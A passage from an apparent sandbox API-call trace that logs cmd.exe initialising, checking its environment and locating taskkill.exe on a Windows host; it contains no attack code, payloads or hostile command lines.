0x3540048 [0054.218] ??_V@YAXPAX@Z () returned 0x2fdfc68 [0054.219] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x3540048 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0054.219] malloc (_Size=0xffce) returned 0x3550020 [0054.219] ??_V@YAXPAX@Z () returned 0x2fdfa3c [0054.220] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3550020, nSize=0x7fe7 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0054.220] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0054.220] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0054.220] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0054.220] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0054.220] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0054.220] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0054.220] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0054.220] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0054.220] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0054.220] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0054.220] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0054.220] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0054.220] GetProcessHeap () returned 0x3270000 [0054.220] RtlFreeHeap (HeapHandle=0x3270000, Flags=0x0, BaseAddress=0x32756b0) returned 1 [0054.220] GetEnvironmentStringsW () returned 0x3274bd8* [0054.221] GetProcessHeap () returned 0x3270000 [0054.221] RtlAllocateHeap (HeapHandle=0x3270000, Flags=0x8, Size=0xae2) returned 0x3277750 [0054.221] FreeEnvironmentStringsA (penv="A") returned 1 [0054.221] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1b [0054.221] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0054.221] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0054.221] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0054.221] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0054.221] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0054.221] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0054.221] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0054.221] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0054.221] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0054.221] malloc (_Size=0xffce) returned 0x355fff8 [0054.221] ??_V@YAXPAX@Z () returned 0x2fdf7d4 [0054.222] GetProcessHeap () returned 0x3270000 [0054.222] RtlAllocateHeap (HeapHandle=0x3270000, Flags=0x8, Size=0x38) returned 0x3270ae0 [0054.222] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x355fff8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0054.222] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x7fe7, lpBuffer=0x355fff8, lpFilePart=0x2fdf820 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x2fdf820*="Desktop") returned 0x17 [0054.222] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0054.223] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2fdf5a0 | out: lpFindFileData=0x2fdf5a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x3270b20 [0054.223] FindClose (in: hFindFile=0x3270b20 | out: hFindFile=0x3270b20) returned 1 [0054.223] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0x2fdf5a0 | out: lpFindFileData=0x2fdf5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x3270b20 [0054.223] FindClose (in: hFindFile=0x3270b20 | out: hFindFile=0x3270b20) returned 1 [0054.223] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0x2fdf5a0 | out: lpFindFileData=0x2fdf5a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xff77889f, ftLastAccessTime.dwHighDateTime=0x1d53d3b, ftLastWriteTime.dwLowDateTime=0xff77889f, ftLastWriteTime.dwHighDateTime=0x1d53d3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x3270b20 [0054.223] FindClose (in: hFindFile=0x3270b20 | out: hFindFile=0x3270b20) returned 1 [0054.223] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0054.223] SetCurrentDirectoryW (lpPathName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 1 [0054.223] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\FD1HVy\\Desktop") returned 1 [0054.223] GetProcessHeap () returned 0x3270000 [0054.223] RtlFreeHeap (HeapHandle=0x3270000, Flags=0x0, BaseAddress=0x3277750) returned 1 [0054.223] GetEnvironmentStringsW () returned 0x3274bd8* [0054.223] GetProcessHeap () returned 0x3270000 [0054.224] RtlAllocateHeap (HeapHandle=0x3270000, Flags=0x8, Size=0xb1a) returned 0x3276c60 [0054.224] FreeEnvironmentStringsA (penv="=") returned 1 [0054.224] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x3540048 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0054.224] GetProcessHeap () returned 0x3270000 [0054.224] RtlFreeHeap (HeapHandle=0x3270000, Flags=0x0, BaseAddress=0x3270ae0) returned 1 [0054.224] ??_V@YAXPAX@Z () returned 0x1 [0054.224] ??_V@YAXPAX@Z () returned 0x1 [0054.224] GetProcessHeap () returned 0x3270000 [0054.224] RtlAllocateHeap (HeapHandle=0x3270000, Flags=0x8, Size=0x400e) returned 0x3278d68 [0054.224] GetProcessHeap () returned 0x3270000 [0054.224] RtlAllocateHeap (HeapHandle=0x3270000, Flags=0x8, Size=0x62) returned 0x3277788 [0054.224] GetProcessHeap () returned 0x3270000 [0054.224] RtlFreeHeap (HeapHandle=0x3270000, Flags=0x0, BaseAddress=0x3278d68) returned 1 [0054.224] GetConsoleOutputCP () returned 0x1b5 [0054.322] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe23850 | out: lpCPInfo=0xe23850) returned 1 [0054.322] GetUserDefaultLCID () returned 0x409 [0054.323] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xe1f82c, cchData=8 | out: lpLCData=":") returned 2 [0054.323] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2fdfb90, cchData=128 | out: lpLCData="0") returned 2 [0054.323] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2fdfb90, cchData=128 | out: lpLCData="0") returned 2 [0054.323] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2fdfb90, cchData=128 | out: lpLCData="1") returned 2 [0054.323] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xe1f81c, cchData=8 | out: lpLCData="/") returned 2 [0054.323] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xe1f7b8, cchData=32 | out: lpLCData="Mon") returned 4 [0054.323] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xe1f778, cchData=32 | out: lpLCData="Tue") returned 4 [0054.323] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xe1f738, cchData=32 | out: lpLCData="Wed") returned 4 [0054.323] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xe1f6f8, cchData=32 | out: lpLCData="Thu") returned 4 [0054.323] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xe1f6b8, cchData=32 | out: lpLCData="Fri") returned 4 [0054.323] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xe1f678, cchData=32 | out: lpLCData="Sat") returned 4 [0054.323] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xe1f638, cchData=32 | out: lpLCData="Sun") returned 4 [0054.323] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xe1f80c, cchData=8 | out: lpLCData=".") returned 2 [0054.323] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xe1f7f8, cchData=8 | out: lpLCData=",") returned 2 [0054.323] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0054.325] GetProcessHeap () returned 0x3270000 [0054.325] RtlAllocateHeap (HeapHandle=0x3270000, Flags=0x0, Size=0x20c) returned 0x3277840 [0054.325] GetConsoleTitleW (in: lpConsoleTitle=0x3277840, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0054.329] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75e90000 [0054.329] GetProcAddress (hModule=0x75e90000, lpProcName="CopyFileExW") returned 0x75ea4330 [0054.330] GetProcAddress (hModule=0x75e90000, lpProcName="IsDebuggerPresent") returned 0x75ea5930 [0054.330] GetProcAddress (hModule=0x75e90000, lpProcName="SetConsoleInputExeNameW") returned 0x74fe09d0 [0054.330] ??_V@YAXPAX@Z () returned 0x1 [0054.330] GetProcessHeap () returned 0x3270000 [0054.330] RtlAllocateHeap (HeapHandle=0x3270000, Flags=0x8, Size=0x400a) returned 0x3278d68 [0054.330] GetProcessHeap () returned 0x3270000 [0054.330] RtlFreeHeap (HeapHandle=0x3270000, Flags=0x0, BaseAddress=0x3278d68) returned 1 [0054.331] _wcsicmp (_String1="taskkill.exe", _String2=")") returned 75 [0054.331] _wcsicmp (_String1="FOR", _String2="taskkill.exe") returned -14 [0054.331] _wcsicmp (_String1="FOR/?", _String2="taskkill.exe") returned -14 [0054.331] _wcsicmp (_String1="IF", _String2="taskkill.exe") returned -11 [0054.331] _wcsicmp (_String1="IF/?", _String2="taskkill.exe") returned -11 [0054.331] _wcsicmp (_String1="REM", _String2="taskkill.exe") returned -2 [0054.331] _wcsicmp (_String1="REM/?", _String2="taskkill.exe") returned -2 [0054.331] GetProcessHeap () returned 0x3270000 [0054.331] RtlAllocateHeap (HeapHandle=0x3270000, Flags=0x8, Size=0x58) returned 0x3277a58 [0054.331] GetProcessHeap () returned 0x3270000 [0054.331] RtlAllocateHeap (HeapHandle=0x3270000, Flags=0x8, Size=0x22) returned 0x3277ab8 [0054.332] GetProcessHeap () returned 0x3270000 [0054.332] RtlAllocateHeap (HeapHandle=0x3270000, Flags=0x8, Size=0x46) returned 0x3277ae8 [0054.332] GetConsoleTitleW (in: lpConsoleTitle=0x2fdfa88, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0054.333] malloc (_Size=0xffce) returned 0x3552638 [0054.333] ??_V@YAXPAX@Z () returned 0x2fdf814 [0054.334] malloc (_Size=0xffce) returned 0x3562610 [0054.334] ??_V@YAXPAX@Z () returned 0x2fdf5cc [0054.335] GetFileAttributesW (lpFileName="taskkill.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\taskkill.exe")) returned 0xffffffff [0054.335] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0054.335] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0054.335] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0054.335] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0054.335] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0054.335] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0054.335] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0054.335] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0054.335] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0054.335] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0054.335] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0054.335] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0054.335] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0054.335] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0054.335] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0054.335] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0054.335] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0054.335] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0054.335] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0054.336] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0054.336] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0054.336] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0054.336] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0054.336] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0054.336] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0054.336] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0054.336] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0054.336] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0054.336] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0054.336] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0054.336] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0054.336] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0054.336] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0054.336] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0054.336] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0054.336] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0054.336] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0054.336] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0054.336] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0054.336] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0054.336] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0054.336] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0054.336] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0054.336] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0054.336] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0054.336] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0054.336] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0054.336] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0054.336] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0054.336] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0054.336] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0054.336] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0054.337] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0054.337] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0054.337] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0054.337] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0054.337] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0054.337] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0054.337] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0054.337] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0054.337] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0054.337] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0054.337] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0054.337] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0054.337] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0054.337] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0054.337] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0054.337] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0054.337] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0054.337] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0054.337] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0054.337] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0054.337] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0054.337] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0054.337] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0054.337] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0054.337] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0054.337] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0054.337] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0054.337] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0054.337] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0054.337] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0054.337] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0054.337] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0054.337] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0054.337] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0054.337] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0054.338] ??_V@YAXPAX@Z () returned 0x1 [0054.338] GetProcessHeap () returned 0x3270000 [0054.338] RtlAllocateHeap (HeapHandle=0x3270000, Flags=0x8, Size=0xffd6) returned 0x3278d68 [0054.339] GetProcessHeap () returned 0x3270000 [0054.339] RtlAllocateHeap (HeapHandle=0x3270000, Flags=0x8, Size=0x60) returned 0x3277b38 [0054.339] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0054.339] malloc (_Size=0xffce) returned 0x3562610 [0054.339] ??_V@YAXPAX@Z () returned 0x2fdf34c [0054.339] GetProcessHeap () returned 0x3270000 [0054.339] RtlAllocateHeap (HeapHandle=0x3270000, Flags=0x8, Size=0x1ffa4) returned 0x3288d48 [0054.341] SetErrorMode (uMode=0x0) returned 0x0 [0054.341] SetErrorMode (uMode=0x1) returned 0x0 [0054.341] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x3288d50, lpFilePart=0x2fdf36c | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x2fdf36c*="Desktop") returned 0x17 [0054.341] SetErrorMode (uMode=0x0) returned 0x1 [0054.342] GetProcessHeap () returned 0x3270000 [0054.342] RtlReAllocateHeap (Heap=0x3270000, Flags=0x0, Ptr=0x3288d48, Size=0x52) returned 0x3288d48 [0054.342] GetProcessHeap () returned 0x3270000 [0054.342] RtlSizeHeap (HeapHandle=0x3270000, Flags=0x0, MemoryPointer=0x3288d48) returned 0x52 [0054.342] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0054.342] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0054.342] GetProcessHeap () returned 0x3270000 [0054.342] RtlAllocateHeap (HeapHandle=0x3270000, Flags=0x8, Size=0x1b4) returned 0x3277ba0 [0054.342] GetProcessHeap () returned 0x3270000 [0054.342] RtlAllocateHeap (HeapHandle=0x3270000, Flags=0x8, Size=0x360) returned 0x3277d60 [0054.347] GetProcessHeap () returned 0x3270000 [0054.347] RtlReAllocateHeap (Heap=0x3270000, Flags=0x0, Ptr=0x3277d60, Size=0x1b6) returned 0x3277d60 [0054.347] GetProcessHeap () returned 0x3270000 [0054.347] RtlSizeHeap (HeapHandle=0x3270000, Flags=0x0, MemoryPointer=0x3277d60) returned 0x1b6 [0054.347] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0054.347] GetProcessHeap () returned 0x3270000 [0054.347] RtlAllocateHeap (HeapHandle=0x3270000, Flags=0x8, Size=0xe0) returned 0x3277f20 [0054.347] GetProcessHeap () returned 0x3270000 [0054.347] RtlReAllocateHeap (Heap=0x3270000, Flags=0x0, Ptr=0x3277f20, Size=0x76) returned 0x3277f20 [0054.347] GetProcessHeap () returned 0x3270000 [0054.347] RtlSizeHeap (HeapHandle=0x3270000, Flags=0x0, MemoryPointer=0x3277f20) returned 0x76 [0054.348] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0054.348] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\taskkill.exe", fInfoLevelId=0x1, lpFindFileData=0x2fdf118, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2fdf118) returned 0xffffffff [0054.348] GetLastError () returned 0x2 [0054.348] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\taskkill.exe.*", fInfoLevelId=0x1, lpFindFileData=0x2fdf0f8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2fdf0f8) returned 0xffffffff [0054.348] GetLastError () returned 0x2 [0054.348] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0054.348] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\taskkill.exe", fInfoLevelId=0x1, lpFindFileData=0x2fdf118, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2fdf118) returned 0xffffffff [0054.349] GetLastError () returned 0x2 [0054.349] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\taskkill.exe.*", fInfoLevelId=0x1, lpFindFileData=0x2fdf0f8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2fdf0f8) returned 0xffffffff [0054.349] GetLastError () returned 0x2 [0054.349] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0054.349] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\taskkill.exe", fInfoLevelId=0x1, lpFindFileData=0x2fdf118, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2fdf118) returned 0x3277fa0 [0054.349] GetProcessHeap () returned 0x3270000 [0054.349] RtlAllocateHeap (HeapHandle=0x3270000, Flags=0x0, Size=0x14) returned 0x3277fe0 [0054.349] FindClose (in: hFindFile=0x3277fa0 | out: hFindFile=0x3277fa0) returned 1 [0054.349] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0054.349] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0054.349] ??_V@YAXPAX@Z () returned 0x1 [0054.349] GetConsoleTitleW (in: lpConsoleTitle=0x2fdf5fc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0054.350] InitializeProcThreadAttributeList (in: lpAttributeList=0x2fdf528, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2fdf514 | out: lpAttributeList=0x2fdf528, lpSize=0x2fdf514) returned 1 [0054.350] UpdateProcThreadAttribute (in: lpAttributeList=0x2fdf528, dwFlags=0x0, Attribute=0x60001, lpValue=0x2fdf510, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2fdf528, lpPreviousValue=0x0) returned 1 [0054.350] GetStartupInfoW (in: lpStartupInfo=0x2fdf560 | out: lpStartupInfo=0x2fdf560*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0054.350] GetProcessHeap () returned 0x3270000 [0054.350] RtlAllocateHeap (HeapHandle=0x3270000, Flags=0x8, Size=0x18) returned 0x3277fa0 [0054.350] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0054.350] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0054.350] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0054.350] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0054.350] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0054.350] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0054.350] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0054.350] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0054.350] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0054.350] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0054.350] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0054.350] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0054.350] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0054.350] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0054.350] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0054.350] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0054.350] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0054.350] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0054.350] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0054.351] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0054.351] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0054.351] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0054.351] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0054.351] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0054.351] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0054.351] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0054.351] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0054.351] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", 